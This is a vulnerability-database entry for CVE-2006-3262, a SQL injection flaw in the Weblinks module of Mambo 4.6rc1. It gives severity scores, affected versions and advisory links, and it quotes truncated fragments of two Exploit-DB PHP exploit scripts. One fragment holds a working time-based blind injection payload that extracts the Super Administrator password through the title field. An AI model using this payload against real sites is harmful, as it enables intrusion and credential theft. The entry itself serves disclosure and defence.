CVE-2006-3262
published 2006-06-27
CVE-2006-3262: SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the…
Priority P343 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.44% (82.3th percentile)
SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mambo | mambo | <= 4.6 | — |
No detection rules found.
Exploit-DB
Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)
exploitdb·2006-06-22
---
#!/usr/bin/php -q -d short_open_tag=on
126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":
Exploit-DB
Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)
exploitdb·2006-06-17
---
#!/usr/bin/php -q -d short_open_tag=on
mysqld --log=mambo.txt
now login, go to "Submit Weblink" feature, in "Name: " field type:
99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*
in mambo.txt we have:
13 Query SELECT id FROM mos_weblinks
WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'
injection is blind but, as you can see, we can use time delays through MySQL
benchmark() function to ask questions about tables
this works regardless of magic_quotes_gpc settings
*/
error_reporting(0);
ini_set("max_exec
No writeups or analysis indexed.
http://retrogod.altervista.org/mambo_46rc1_sql.html
http://secunia.com/advisories/20745
http://securityreason.com/securityalert/1158
http://securitytracker.com/id?1016334
http://www.mamboserver.com/?option=com_content&task=view&id=207
http://www.osvdb.org/26624
http://www.securityfocus.com/archive/1/437496/100/100/threaded
http://www.securityfocus.com/bid/18492
http://www.vupen.com/english/advisories/2006/2416
2006-06-27
Published